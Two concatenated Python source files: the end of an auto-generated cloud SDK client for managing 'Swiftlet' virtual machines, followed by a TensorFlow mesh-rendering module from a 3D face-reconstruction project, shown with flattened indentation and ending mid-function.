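    #       swiftlet_bundle_sku="<bundle-sku>", swiftlet_image_id="<image-id>")
    #   vm = poller.result()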
def _update_initial(
self,
resource_group_name, # type: str
vm_name, # type: str
tags=None, # type: Optional[Dict[str, str]]
ports=None, # type: Optional[List["models.Port"]]
**kwargs # type: Any
):
# type: (...) -> "models.VirtualMachine"
cls = kwargs.pop('cls', None) # type: ClsType["models.VirtualMachine"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
_parameters = models.VirtualMachineUpdate(tags=tags, ports=ports)
api_version = "2020-03-01-preview"
content_type = kwargs.pop("content_type", "application/json")
# Construct URL
url = self._update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'vmName': self._serialize.url("vm_name", vm_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = 'application/json'
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(_parameters, 'VirtualMachineUpdate')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('VirtualMachine', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('VirtualMachine', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Swiftlet/virtualMachines/{vmName}'} # type: ignore
def begin_update(
self,
resource_group_name, # type: str
vm_name, # type: str
tags=None, # type: Optional[Dict[str, str]]
ports=None, # type: Optional[List["models.Port"]]
**kwargs # type: Any
):
# type: (...) -> LROPoller["models.VirtualMachine"]
"""Update a virtual machine.
:param resource_group_name: The name of the resource group within the user’s subscription ID.
:type resource_group_name: str
:param vm_name: The name of the virtual machine.
:type vm_name: str
:param tags: Resource tags.
:type tags: dict[str, str]
:param ports: Specifies the list of ports to be opened.
:type ports: list[~swiftlet_management_client.models.Port]
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either VirtualMachine or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~swiftlet_management_client.models.VirtualMachine]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["models.VirtualMachine"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._update_initial(
resource_group_name=resource_group_name,
vm_name=vm_name,
tags=tags,
ports=ports,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('VirtualMachine', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Swiftlet/virtualMachines/{vmName}'} # type: ignore
def _delete_initial(
self,
resource_group_name, # type: str
vm_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01-preview"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'vmName': self._serialize.url("vm_name", vm_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Swiftlet/virtualMachines/{vmName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
vm_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Delete a virtual machine.
:param resource_group_name: The name of the resource group within the user’s subscription ID.
:type resource_group_name: str
:param vm_name: The name of the virtual machine.
:type vm_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
vm_name=vm_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Swiftlet/virtualMachines/{vmName}'} # type: ignore
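# Illustrative usage sketch (not part of the generated client; the client class
# and attribute names below are assumptions for illustration only): a
# long-running delete is typically driven through the returned LROPoller,
# e.g. with azure.identity's DefaultAzureCredential.
#
#     from azure.identity import DefaultAzureCredential
#     client = SwiftletManagementClient(DefaultAzureCredential(), subscription_id)
#     poller = client.virtual_machines.begin_delete("my-rg", "my-vm")
#     poller.result()  # blocks until the service reports the delete finished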
def get(
self,
resource_group_name, # type: str
vm_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "models.VirtualMachine"
"""Get information about the virtual machine.
:param resource_group_name: The name of the resource group within the user’s subscription ID.
:type resource_group_name: str
:param vm_name: The name of the virtual machine.
:type vm_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: VirtualMachine, or the result of cls(response)
:rtype: ~swiftlet_management_client.models.VirtualMachine
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.VirtualMachine"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01-preview"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'vmName': self._serialize.url("vm_name", vm_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('VirtualMachine', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Swiftlet/virtualMachines/{vmName}'} # type: ignore
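# Illustrative sketch (assumed client/attribute names): `get` returns the
# deserialized VirtualMachine model unless a custom `cls` callable is supplied.
#
#     vm = client.virtual_machines.get("my-rg", "my-vm")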
def list_by_resource_group(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["models.VirtualMachineListResult"]
"""List all of the virtual machines in the specified resource group. Use the nextLink property in
the response to get the next page of virtual machines.
:param resource_group_name: The name of the resource group within the user’s subscription ID.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either VirtualMachineListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~swiftlet_management_client.models.VirtualMachineListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.VirtualMachineListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01-preview"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('VirtualMachineListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Swiftlet/virtualMachines'} # type: ignore
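# Illustrative sketch (assumed client/attribute names): the returned ItemPaged
# follows the nextLink automatically, so iterating it yields VirtualMachine
# items across all pages.
#
#     for vm in client.virtual_machines.list_by_resource_group("my-rg"):
#         print(vm.name)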
def list_by_subscription(
self,
**kwargs # type: Any
):
# type: (...) -> Iterable["models.VirtualMachineListResult"]
"""List all of the virtual machines in the specified subscription. Use the nextLink property in
the response to get the next page of virtual machines.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either VirtualMachineListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~swiftlet_management_client.models.VirtualMachineListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.VirtualMachineListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01-preview"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
if not next_link:
# Construct URL
url = self.list_by_subscription.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('VirtualMachineListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_subscription.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Swiftlet/virtualMachines'} # type: ignore
|
Face Reconstruction/Self-Supervised Monocular 3D Face Reconstruction by Occlusion-Aware Multi-view Geometry Consistency/src_common/geometry/render/api_tf_mesh_render.py | swapnilgarg7/Face-X | 302 | 12776414 | <filename>Face Reconstruction/Self-Supervised Monocular 3D Face Reconstruction by Occlusion-Aware Multi-view Geometry Consistency/src_common/geometry/render/api_tf_mesh_render.py<gh_stars>100-1000
# system
from __future__ import print_function
# python lib
import math
from copy import deepcopy
import numpy as np
# tf_render
import tensorflow as tf
# self
from thirdParty.tf_mesh_renderer.mesh_renderer.mesh_renderer import phong_shader, tone_mapper
from thirdParty.tf_mesh_renderer.mesh_renderer.rasterize_triangles import rasterize_triangles
# perspective
def mesh_renderer_camera_light(vertices, triangles, normals, diffuse_colors,
mtx_camera, mtx_perspective_frustrum, camera_position,
image_width, image_height):
"""Renders an input scene using phong shading, and returns an output image.
Args:
vertices: 3-D float32 tensor with shape [batch_size, vertex_count, 3]. Each
triplet is an xyz position in world space.
triangles: 2-D int32 tensor with shape [triangle_count, 3]. Each triplet
should contain vertex indices describing a triangle such that the
triangle's normal points toward the viewer if the forward order of the
triplet defines a clockwise winding of the vertices. Gradients with
respect to this tensor are not available.
normals: 3-D float32 tensor with shape [batch_size, vertex_count, 3]. Each
triplet is the xyz vertex normal for its corresponding vertex. Each
vector is assumed to be already normalized.
diffuse_colors: 3-D float32 tensor with shape [batch_size,
vertex_count, 3]. The RGB diffuse reflection in the range [0,1] for
each vertex.
mtx_camera: 3-D tensor with shape [batch_size, 4, 4] or 2-D tensor with
shape [4, 4] specifying the camera model view matrix
mtx_perspective_frustrum: 3-D tensor with shape [batch_size, 4, 4] or 2-D tensor with
shape [4, 4] specifying the perspective and frustrum matrix
camera_position: 2-D tensor with shape [batch_size, 3] or 1-D tensor with
shape [3] specifying the XYZ world space camera position.
image_width: int specifying desired output image width in pixels.
image_height: int specifying desired output image height in pixels.
Returns:
A 3-tuple (diffuse_colors, pixel_mask, triangle_ids):
diffuse_colors: 4-D float32 tensor of shape [batch_size, image_height,
image_width, 3] holding the interpolated per-vertex colors at each pixel,
flipped vertically into image coordinates.
pixel_mask: float32 tensor of shape [batch_size, image_height, image_width]
that is 1.0 where the mesh covers the pixel and 0.0 for background pixels.
triangle_ids: int32 tensor of shape [batch_size, image_height, image_width, 1]
giving the id of the triangle rasterized at each pixel.
Raises:
ValueError: An invalid argument to the method is detected.
"""
if len(vertices.shape) != 3:
raise ValueError('Vertices must have shape [batch_size, vertex_count, 3].')
batch_size = vertices.shape[0].value
if len(normals.shape) != 3:
raise ValueError('Normals must have shape [batch_size, vertex_count, 3].')
if len(diffuse_colors.shape) != 3:
raise ValueError(
'vertex_diffuse_colors must have shape [batch_size, vertex_count, 3].')
if camera_position.get_shape().as_list() == [3]:
camera_position = tf.tile(
tf.expand_dims(camera_position, axis=0), [batch_size, 1])
elif camera_position.get_shape().as_list() != [batch_size, 3]:
raise ValueError('Camera_position must have shape [batch_size, 3]')
# TODO: Debug Shape
if mtx_camera.get_shape().as_list() == [4, 4]:
mtx_camera = tf.tile(
tf.expand_dims(mtx_camera, axis=0), [batch_size, 1, 1])
elif mtx_camera.get_shape().as_list() != [batch_size, 4, 4]:
raise ValueError('mtx_camera must have shape [batch_size, 4, 4]')
if mtx_perspective_frustrum.get_shape().as_list() == [4, 4]:
mtx_perspective_frustrum = tf.tile(
tf.expand_dims(mtx_perspective_frustrum, axis=0), [batch_size, 1, 1])
elif mtx_perspective_frustrum.get_shape().as_list() != [batch_size, 4, 4]:
raise ValueError('mtx_perspective_frustrum must have shape [batch_size, 4, 4]')
vertex_attributes = tf.concat([normals, vertices, diffuse_colors], axis=2)
clip_space_transforms = tf.matmul(mtx_perspective_frustrum, mtx_camera, name="mtx_clip_space_transforms_batch")
pixel_attributes, alpha, tri_ids = rasterize_triangles(
vertices, vertex_attributes, triangles, clip_space_transforms,
image_width, image_height, [-1] * vertex_attributes.shape[2].value)
# Extract the interpolated vertex attributes from the pixel buffer and
# supply them to the shader:
#pixel_normals = tf.nn.l2_normalize(pixel_attributes[:, :, :, 0:3], dim=3)
#pixel_positions = pixel_attributes[:, :, :, 3:6]
diffuse_colors = pixel_attributes[:, :, :, 6:9]
diffuse_colors = tf.reverse(diffuse_colors, axis=[1])
#return renders, pixel_mask
pixel_mask = alpha > 0.5
pixel_mask = tf.cast(pixel_mask, dtype=tf.float32)
pixel_mask = tf.reverse(pixel_mask, axis=[1])
#
tri_ids = tf.expand_dims(tri_ids, -1)
return diffuse_colors, pixel_mask, tri_ids
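# Minimal usage sketch (placeholder tensors; shapes only, not part of the
# original module):
#
#     batch = 1
#     verts = tf.zeros([batch, 4, 3])                        # world-space xyz
#     tris = tf.constant([[0, 1, 2], [0, 2, 3]], tf.int32)   # [triangle_count, 3]
#     norms = tf.ones([batch, 4, 3])
#     colors = tf.ones([batch, 4, 3])
#     cam = tf.eye(4, batch_shape=[batch])                   # model-view matrix
#     proj = tf.eye(4, batch_shape=[batch])                  # perspective * frustum
#     eye = tf.zeros([batch, 3])
#     rgb, mask, tri_ids = mesh_renderer_camera_light(
#         verts, tris, norms, colors, cam, proj, eye, 256, 256)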
def mesh_renderer_camera(vertices, triangles, normals, diffuse_colors,
mtx_camera, mtx_perspective_frustrum, camera_position,
light_positions, light_intensities, image_width, image_height,
specular_colors=None, shininess_coefficients=None, ambient_color=None, background=-1
):
"""Renders an input scene using phong shading, and returns an output image.
Args:
vertices: 3-D float32 tensor with shape [batch_size, vertex_count, 3]. Each
triplet is an xyz position in world space.
triangles: 2-D int32 tensor with shape [triangle_count, 3]. Each triplet
should contain vertex indices describing a triangle such that the
triangle's normal points toward the viewer if the forward order of the
triplet defines a clockwise winding of the vertices. Gradients with
respect to this tensor are not available.
normals: 3-D float32 tensor with shape [batch_size, vertex_count, 3]. Each
triplet is the xyz vertex normal for its corresponding vertex. Each
vector is assumed to be already normalized.
diffuse_colors: 3-D float32 tensor with shape [batch_size,
vertex_count, 3]. The RGB diffuse reflection in the range [0,1] for
each vertex.
mtx_camera: 3-D tensor with shape [batch_size, 4, 4] or 2-D tensor with
shape [4, 4] specifying the camera model view matrix
mtx_perspective_frustrum: 3-D tensor with shape [batch_size, 4, 4] or 2-D tensor with
shape [4, 4] specifying the perspective and frustrum matrix
camera_position: 2-D tensor with shape [batch_size, 3] or 1-D tensor with
shape [3] specifying the XYZ world space camera position.
light_positions: a 3-D tensor with shape [batch_size, light_count, 3]. The
XYZ position of each light in the scene. In the same coordinate space as
pixel_positions.
light_intensities: a 3-D tensor with shape [batch_size, light_count, 3]. The
RGB intensity values for each light. Intensities may be above one.
image_width: int specifying desired output image width in pixels.
image_height: int specifying desired output image height in pixels.
specular_colors: 3-D float32 tensor with shape [batch_size,
vertex_count, 3]. The RGB specular reflection in the range [0, 1] for
each vertex. If supplied, specular reflections will be computed, and
both specular_colors and shininess_coefficients are expected.
shininess_coefficients: a 0D-2D float32 tensor with maximum shape
[batch_size, vertex_count]. The phong shininess coefficient of each
vertex. A 0D tensor or float gives a constant shininess coefficient
across all batches and images. A 1D tensor must have shape [batch_size],
and a single shininess coefficient per image is used.
ambient_color: a 2D tensor with shape [batch_size, 3]. The RGB ambient
color, which is added to each pixel in the scene. If None, it is
assumed to be black.
Returns:
A 4-D float32 tensor of shape [batch_size, image_height, image_width, 4]
containing the lit RGBA color values for each image at each pixel. RGB
colors are the intensity values before tonemapping and can be in the range
[0, infinity]. Clipping to the range [0,1] with tf_render.clip_by_value is likely
reasonable for both viewing and training most scenes. More complex scenes
with multiple lights should tone map color values for display only. One
simple tonemapping approach is to rescale color values as x/(1+x); gamma
compression is another common technique. Alpha values are zero for
background pixels and near one for mesh pixels.
Raises:
ValueError: An invalid argument to the method is detected.
"""
if len(vertices.shape) != 3:
raise ValueError('Vertices must have shape [batch_size, vertex_count, 3].')
batch_size = vertices.shape[0].value
if len(normals.shape) != 3:
raise ValueError('Normals must have shape [batch_size, vertex_count, 3].')
if len(light_positions.shape) != 3:
raise ValueError(
'Light_positions must have shape [batch_size, light_count, 3].')
if len(light_intensities.shape) != 3:
raise ValueError(
'Light_intensities must have shape [batch_size, light_count, 3].')
if len(diffuse_colors.shape) != 3:
raise ValueError(
'vertex_diffuse_colors must have shape [batch_size, vertex_count, 3].')
if (ambient_color is not None and
ambient_color.get_shape().as_list() != [batch_size, 3]):
raise ValueError('Ambient_color must have shape [batch_size, 3].')
if camera_position.get_shape().as_list() == [3]:
camera_position = tf.tile(
tf.expand_dims(camera_position, axis=0), [batch_size, 1])
elif camera_position.get_shape().as_list() != [batch_size, 3]:
raise ValueError('Camera_position must have shape [batch_size, 3]')
# TODO: Debug Shape
if mtx_camera.get_shape().as_list() == [4, 4]:
mtx_camera = tf.tile(
tf.expand_dims(mtx_camera, axis=0), [batch_size, 1, 1])
elif mtx_camera.get_shape().as_list() != [batch_size, 4, 4]:
raise ValueError('mtx_camera must have shape [batch_size, 4, 4]')
if mtx_perspective_frustrum.get_shape().as_list() == [4, 4]:
mtx_perspective_frustrum = tf.tile(
tf.expand_dims(mtx_perspective_frustrum, axis=0), [batch_size, 1, 1])
elif mtx_perspective_frustrum.get_shape().as_list() != [batch_size, 4, 4]:
raise ValueError('mtx_perspective_frustrum must have shape [batch_size, 4, 4]')
if specular_colors is not None and shininess_coefficients is None:
raise ValueError(
'Specular colors were supplied without shininess coefficients.')
if shininess_coefficients is not None and specular_colors is None:
raise ValueError(
'Shininess coefficients were supplied without specular colors.')
if specular_colors is not None:
# Since a 0-D float32 tensor is accepted, also accept a float.
if isinstance(shininess_coefficients, float):
shininess_coefficients = tf.constant(
shininess_coefficients, dtype=tf.float32)
if len(specular_colors.shape) != 3:
raise ValueError('The specular colors must have shape [batch_size, '
'vertex_count, 3].')
if len(shininess_coefficients.shape) > 2:
raise ValueError('The shininess coefficients must have shape at most'
'[batch_size, vertex_count].')
# If we don't have per-vertex coefficients, we can just reshape the
# input shininess to broadcast later, rather than interpolating an
# additional vertex attribute:
if len(shininess_coefficients.shape) < 2:
vertex_attributes = tf.concat(
[normals, vertices, diffuse_colors, specular_colors], axis=2)
else:
vertex_attributes = tf.concat(
[
normals, vertices, diffuse_colors, specular_colors,
tf.expand_dims(shininess_coefficients, axis=2)
],
axis=2)
else:
vertex_attributes = tf.concat([normals, vertices, diffuse_colors], axis=2)
# camera_matrices = camera_utils.look_at(camera_position, camera_lookat,
# camera_up)
#
# perspective_transforms = camera_utils.perspective(image_width / image_height,
# fov_y, near_clip, far_clip)
clip_space_transforms = tf.matmul(mtx_perspective_frustrum, mtx_camera, name="mtx_clip_space_transforms_batch")
pixel_attributes, alpha, tri_ids = rasterize_triangles(
vertices, vertex_attributes, triangles, clip_space_transforms,
image_width, image_height, [background] * vertex_attributes.shape[2].value)
# Extract the interpolated vertex attributes from the pixel buffer and
# supply them to the shader:
pixel_normals = tf.nn.l2_normalize(pixel_attributes[:, :, :, 0:3], dim=3)
pixel_positions = pixel_attributes[:, :, :, 3:6]
diffuse_colors = pixel_attributes[:, :, :, 6:9]
if specular_colors is not None:
specular_colors = pixel_attributes[:, :, :, 9:12]
# Retrieve the interpolated shininess coefficients if necessary, or just
# reshape our input for broadcasting:
if len(shininess_coefficients.shape) == 2:
shininess_coefficients = pixel_attributes[:, :, :, 12]
else:
shininess_coefficients = tf.reshape(shininess_coefficients, [-1, 1, 1])
pixel_mask = tf.cast(tf.reduce_any(diffuse_colors >= 0, axis=3), tf.float32)
renders = phong_shader(
normals=pixel_normals,
alphas=pixel_mask,
pixel_positions=pixel_positions,
light_positions=light_positions,
light_intensities=light_intensities,
diffuse_colors=diffuse_colors,
camera_position=camera_position if specular_colors is not None else None,
specular_colors=specular_colors,
shininess_coefficients=shininess_coefficients,
ambient_color=ambient_color)
#return renders, pixel_mask
pixel_mask = alpha > 0.5
pixel_mask = tf.cast(pixel_mask, dtype=tf.float32)
pixel_mask = tf.reverse(pixel_mask, axis=[1])
return renders, pixel_mask
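# Usage sketch (placeholder tensors as in the sketch above, illustration only):
# the lighting inputs are batched per-light tensors, e.g. a single white point
# light.
#
#     light_pos = tf.constant([[[0.0, 0.0, 5.0]]])   # [batch, light_count, 3]
#     light_rgb = tf.ones([1, 1, 3])                 # [batch, light_count, 3]
#     renders, mask = mesh_renderer_camera(
#         verts, tris, norms, colors, cam, proj, eye,
#         light_pos, light_rgb, 256, 256)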
def mesh_depthmap_camera(vertices, triangles, mtx_ext,
mtx_camera, mtx_perspective_frustrum,
image_width, image_height
):
"""Renders an input scene using phong shading, and returns an output image.
Args:
vertices: 3-D float32 tensor with shape [batch_size, vertex_count, 3]. Each
triplet is an xyz position in world space.
triangles: 2-D int32 tensor with shape [triangle_count, 3]. Each triplet
should contain vertex indices describing a triangle such that the
triangle's normal points toward the viewer if the forward order of the
triplet defines a clockwise winding of the vertices. Gradients with
respect to this tensor are not available.
normals: 3-D float32 tensor with shape [batch_size, vertex_count, 3]. Each
triplet is the xyz vertex normal for its corresponding vertex. Each
vector is assumed to be already normalized.
mtx_camera: 3-D tensor with shape [batch_size, 4, 4] or 2-D tensor with
shape [4, 4] specifying the camera model view matrix
mtx_perspective_frustrum: 3-D tensor with shape [batch_size, 4, 4] or 2-D tensor with
shape [4, 4] specifying the perspective and frustrum matrix
camera_position: 2-D tensor with shape [batch_size, 3] or 1-D tensor with
shape [3] specifying the XYZ world space camera position.
image_width: int specifying desired output image width in pixels.
image_height: int specifying desired output image height in pixels.
Returns:
A 4-D float32 tensor of shape [batch_size, image_height, image_width, 4]
containing the lit RGBA color values for each image at each pixel. RGB
colors are the intensity values before tonemapping and can be in the range
[0, infinity]. Clipping to the range [0,1] with tf_render.clip_by_value is likely
reasonable for both viewing and training most scenes. More complex scenes
with multiple lights should tone map color values for display only. One
simple tonemapping approach is to rescale color values as x/(1+x); gamma
compression is another common techinque. Alpha values are zero for
background pixels and near one for mesh pixels.
Raises:
ValueError: An invalid argument to the method is detected.
"""
if len(vertices.shape) != 3:
raise ValueError('Vertices must have shape [batch_size, vertex_count, 3].')
batch_size = vertices.shape[0].value
# TODO: Debug Shape
if mtx_camera.get_shape().as_list() == [4, 4]:
mtx_camera = tf.tile(
tf.expand_dims(mtx_camera, axis=0), [batch_size, 1, 1])
elif mtx_camera.get_shape().as_list() != [batch_size, 4, 4]:
raise ValueError('mtx_camera must have shape [batch_size, 4, 4]')
if mtx_perspective_frustrum.get_shape().as_list() == [4, 4]:
mtx_perspective_frustrum = tf.tile(
tf.expand_dims(mtx_perspective_frustrum, axis=0), [batch_size, 1, 1])
elif mtx_perspective_frustrum.get_shape().as_list() != [batch_size, 4, 4]:
raise ValueError('mtx_perspective_frustrum must have shape [batch_size, 4, 4]')
# vertex attribute of depthmap is only z
vertex_attributes = vertices
#vertex_attributes = tf_render.expand_dims(vertex_attributes, -1)
# camera_matrices = camera_utils.look_at(camera_position, camera_lookat,
# camera_up)
#
# perspective_transforms = camera_utils.perspective(image_width / image_height,
# fov_y, near_clip, far_clip)
clip_space_transforms = tf.matmul(mtx_perspective_frustrum, mtx_camera, name="mtx_clip_space_transforms_batch")
pixel_attributes, alpha, _ = rasterize_triangles(
vertices, vertex_attributes, triangles, clip_space_transforms,
image_width, image_height, [99999999] * vertex_attributes.shape[2].value)
# Extract the interpolated vertex attributes from the pixel buffer and
# supply them to the shader:
filler_homo = tf.ones(shape=[pixel_attributes.shape[0], pixel_attributes.shape[1], pixel_attributes.shape[2], 1])
pixel_attributes = tf.concat([pixel_attributes, filler_homo], axis=3)
pixel_attributes = tf.reshape(pixel_attributes, shape=[batch_size, -1, 4])
